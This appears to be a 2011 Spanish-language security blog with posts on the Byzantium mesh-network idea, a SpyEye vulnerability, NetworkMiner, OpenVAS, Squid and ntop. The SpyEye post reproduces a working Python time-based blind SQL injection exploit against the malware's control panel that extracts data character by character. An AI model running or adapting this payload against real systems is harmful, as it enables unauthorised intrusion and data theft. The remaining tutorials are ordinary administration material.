lunes, 3 de octubre de 2011

Byzantium Proyect

Cual es el mayor problema de la información ? en principio la manipulación , y cual es el mayor problema de la manipulación ? el control de la misma. Ya hemos visto en varias ocasiones como el gobierno de varios paises cortaba la comunicación con el resto de el mundo para que no se vieran las cosas tan **** que se hacen en tiempos de guerra o amenaza de seguridad. Este hecho ha llevado a numerosos activistas a considerar cada vez mas el cableado de internet como un nuevo poder politico manipulable. En consecuencia nace el proyecto Bizancio para un futuro "internet casero" en el que poder conectarse sin necesidad de que los gobiernos o ISP hagan de intermediarios, espien nuestros dados especulando con nuestras estadisticas o manipulacion de datos para su beneficio. Su idea es basarla en una red de malla que básicamente funcionaria haciendo que todos sus usuarios fueran nodos y ala vez esten interconectados entre si (como los buenos bichos jeje). El promotor de la idea (en los EUA) es una persona llamada "TheDoctor" que oculta su nombre real por diversas razones , este activista defiende la idea de un internet totalmente libre , y no un internet de pertenezca a 4 empresas , tambien apuesta por el fusilamiento de la creacion de falsos "Dioses" como Mark Zuckerberg (fb) o Steve Jobs a la que la gente los trata como tales en su Olimpo digital. FuEnTe

martes, 20 de septiembre de 2011

Descubierta Vulnerabilidad en Spyeye

SpyEye es un malware con capacidades de puerta trasera que intenta robar información sensible relacionada con la banca en línea y las transacciones de tarjetas de crédito de la máquina infectada. SpyEye se vende a través de su autor en un formato fácil de configurar forma de kit, que contiene el ejecutable del troyano en sí, el mando y control (C & C) del servidor y la configuración básica para orientar sitios web de banca. A partir de principios de 2011, SpyEye se ha fusionado la funcionalidad de la familia troyano Zeus, que ha sido vendida al autor SpyEye, y ahora es cada vez más sofisticados en lo que respecta a las características y funcionalidad,En agosto de el 2011 se libero el codigo. En agosto de el 2011 se libero el código fuente de el malware y 1 mes mas tarde ya tenemos la primera vulnerabilidad con el primer exploit generado , afecta a las siguientes firmas :


Trojan-Spy.Win32.SpyEyes.evg (Kaspersky)
PWS-Spyeye.m (McAfee)
Trojan:Win32/EyeStye.H (Microsoft)
A variant of Win32/Spy.SpyEye.CA (NOD32)
W32/Malware.QOOC (Norman)
Trojan.Zbot (Symantec)
Mal_Xed-24 (Trend Micro)



Python Code: fuente

from httplib import HTTPConnection from time import time from sys import exit, argv, stdout import urllib  print """   Example:                                                           Spypwned 192.168.0.12 /directorio/ "version()"                           """   if len(argv)<=3: exit() else:   print "[+]Iniciando..."   host = argv[1] path = argv[2] sql = argv[3] port = 80    hash = "" full = []   for k in range(48,122):      full.append(k) full.append(0) # full vale [48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 0] # Es el charset a probar  delay = 0.5 a=1  while a <= 32:     for i in full:         j = 0         if i == 0:  exit('\n[+]FIN\n')         #         start = time()         # hora de inicio para el delay         conn = HTTPConnection(host,port)         #values = { "id" : "1 AND (SELECT IF((IFNULL(ASCII(SUBSTRING((4.0.5),a,1)),0)="K"),BENCHMARK(9000000,SHA1(1)),1));-- /*" }         values = { "id" : "1 AND (SELECT IF((IFNULL(ASCII(SUBSTRING((" + sql + ")," + str(j) + ",1)),0)=" + str(i) + "),BENCHMARK(9000000,SHA1(1)),1));-- /*" }         data = urllib.urlencode(values)         print data         conn.request("GET", path + "frm_cards_edit.php?" + data )         response = conn.getresponse()         read = response.read()              print read                   if response.status == 404: exit('[+]404')         # da 404 luego termina         now = time()         if now - start > delay:         # ha salido true luego el caracter es valido             stdout.write(chr(i))             stdout.flush()             hash += chr(i)             a += 1             break;         else: j += 1         print "i vale %s, y J vale %s" %(i,j)


Tambien disponemos de un tracker , que nos avisa en todo momento los bots que hay conectados a la red , direcciones , nacionalidades y estados.

lunes, 19 de septiembre de 2011

NetworkMiner 1.1

NetworkMiner es una herramienta de análisis forense (NFAT) para Windows. NetworkMiner se puede utilizar como un sniffer de red pasivo / o como herramienta de captura, con el fin de detectar sistemas operativos, sesiones, host, etc . NetworkMiner también puede analizar los archivos PCAP para análisis fuera de línea y regenerar / ensamblar archivos transmitidos y los certificados de los archivos PCAP.

NetworkMiner recopila los datos (por ejemplo, las pruebas forenses) sobre las máquinas de la red en lugar de recoger datos sobre el tráfico en la red. La vista de la interfaz de usuario principal está centrado en host (información agrupada por host) en lugar de centrado en paquetes (información que se presenta como una lista de paquetes / cuadros).

web y descarga















viernes, 6 de mayo de 2011

OpenVas

OpenVAS ( en un principio GNessUs , que viene de el famoso Nessus) es un marco de diversos servicios , herramientas y tests , que ofrece un análisis de vulnerabilidad y la solución de gestión de vulnerabilidades.
El escáner de seguridad real se acompaña con una alimentación diaria actualizada de la Red de Pruebas de Vulnerabilidad (NVTs), más de 21.000 (a fecha de mayo de 2011).

La primera vez que lanzamos el OpenVas hay que hacer 2 cosas basicas , la primera es crear un certificado : openvas-mkcert (hay que poner valores que existan, no tienen que ser reales) y la segunda es crear un usuario en el servidor : openvas-adduser (creamos el user y salimos con CTRL+D). Antes de arrancar el servidor hay que actualizar la lista de plugins con el commando : openvas-nvt-sync (tambien tarda lo suyo..) una vez terminado , lanzamos el servidor con : openvassd (es normal que se tome su tiempo al lanzar el server ya que son mas de 20.000 plugins) .
Una vez que esta todo configurado en el servidor (y esta lanzado) podemos empezar con el cliente (que es desde el que lanzamos los tests) lo lanzamos con : OpenVAS-Client , una vez arrancado lo conectamos al servidor con el usuario y password que creamos antes con el openvas-adduser (echo esto tendremos acceso a todos los plugins y podremos hacer tests a la ip que queramos)

martes, 15 de marzo de 2011

Configurando Squid

Squid es un proxy-cache que sirve para acelerar la carga de webs almacenando gran parte de ellas en el disco duro (de el proxy)
Supongamos que ya teneis instalado Squid en vuestro S.O. (yo lo instale en la backtrack 4 r2) , yo lo he tenido que instalar con : apt-get install squid (antes actualiza el apt). Squid se configura desde el fichero: /etc/squid.conf con cualquier editor de texto.
Lo primero que vamos a modificar es el puerto de escucha de el proxy que por defecto viene asi :http_port 3128 y que nosotros vamos a sumar esta otra linea debajo de la otra (asi escuchara en los 2 puertos , evitar dejar espacios vacios) :http_port 8080 . Lo siguiente es saber de cuanta ram disponemos , si tenemos mas de 128 mb/RAM tendremos que buscar la siguiente linea,#cache_mem 8 MB , la descomentamos (le quitamos el #) y la dejamos asi: cache_mem 16 MB , por defecto funciona a 8MB aunque esta linea este comentada.
El siguiente paso es configurar el cache en disco , para eso buscamos la linea: cache_dir ufs /var/spool/squid 100 16 256 , se puede incrementar tanto como el disco duro nos deje , la siguiente linea aumenta el almacenamiento de webs a 500mb : cache_dir ufs /var/spool/squid 500 16 256 ,los numeros 16 y 256.
Lo siguiente seria hacer listas de control de acceso que definan el rango de ip de tu red o bien solo algunas maquinas. Para ello buscaremos la siguiente sintaxis: acl (nombre de la lista) src (ip o rango de ips) si queremos establecer una lista que incluya toda nuestra red, suponiendo que nuestro rango de ip seria 192.168.3.x con mascara de subred 255.255.255.0, tendriamos que incorporar la siguiente linea a nuestro squid.conf: acl proxyhosts src 192.168.3.0/255.255.255.0 ,tambien podemos hacerlo atraves de un fichero : acl proxyhosts src "/etc/squid/proxyhosts" y el fichero quedaria algo asi :
192.168.3.2
192.168.3.22
192.168.3.5
192.168.3.55
192.168.3.21

Las reglas de control de acceso se aplicarian a las listas de control de acceso , estas deben de situarse despues de la siguiente linea: # INSERT YOUT OWN RULE(S) HERE TO ALLOW ACCESS FROM YOU CLIENTS
la linea basica seria asi : http_access (deny o allow) (lista de control de acceso) , si quisieramos permitir la lista que creamos llamada proxyhosts tendriamos que escribir la siguiente linea: http_access allow proxyhosts
si todo ha salido bien deberiamos de configurar el proxy en los ordenadores que lo vayan a usar con la ip de el servidorproxy y el puerto que configuramos antes ej: 192.168.3.5:8080. Para lanzar el proxy podeis escriber squid en cualquier consola , para reiniciar el servicio : service squid restart (bastante util para depurar errores) y para pararlo service squid stop .

jueves, 10 de marzo de 2011

Ntop

Ntop es un Sniffer con gestion via web imprescindible para cualquier red, los protocolos que es capaz de monitorizar son: TCP/UDP/ICMP, (R)ARP, IPX, DLC, Decnet, AppleTalk, Netbios, y ya dentro de TCP/UDP es capaz de agruparlos por FTP, HTTP, DNS, Telnet, SMTP/POP/IMAP, SNMP, NFS, X11 , es muy util a la hora de ver quien consume mas ancho de banda en una red , o para saber que dispositivos hay en tu red y que es lo que hacen ^^. Si no lo teneis ya descargado, os lo podeis bajar de su web o desde el apt , aptitude o cualquier gestor de paquetes , esta disponible en windows y linux , lo que pasa es que creo que para win necesita licencia .....
Una vez instalado , el primer paso es asignarle una password al Administrador de el ntop , para eso abrimos una root-shell , y ejecutamos:
ntop --set-admin-password
ahora hay que lanzarlo , podemos lanzarlo directamente:
ntop
o podemos lanzarlo como servicio:
service ntop start
una vez lanzado nos creara un servidor web desde el que podemos configurar todo el software he incluir plugins y al que podemos acceder abriendo un navegador , escribiendo nuestra ip y el puerto 3000 , algo asi : 192.168.1.69:3000 , tambien podemos : 127.0.0.1:3000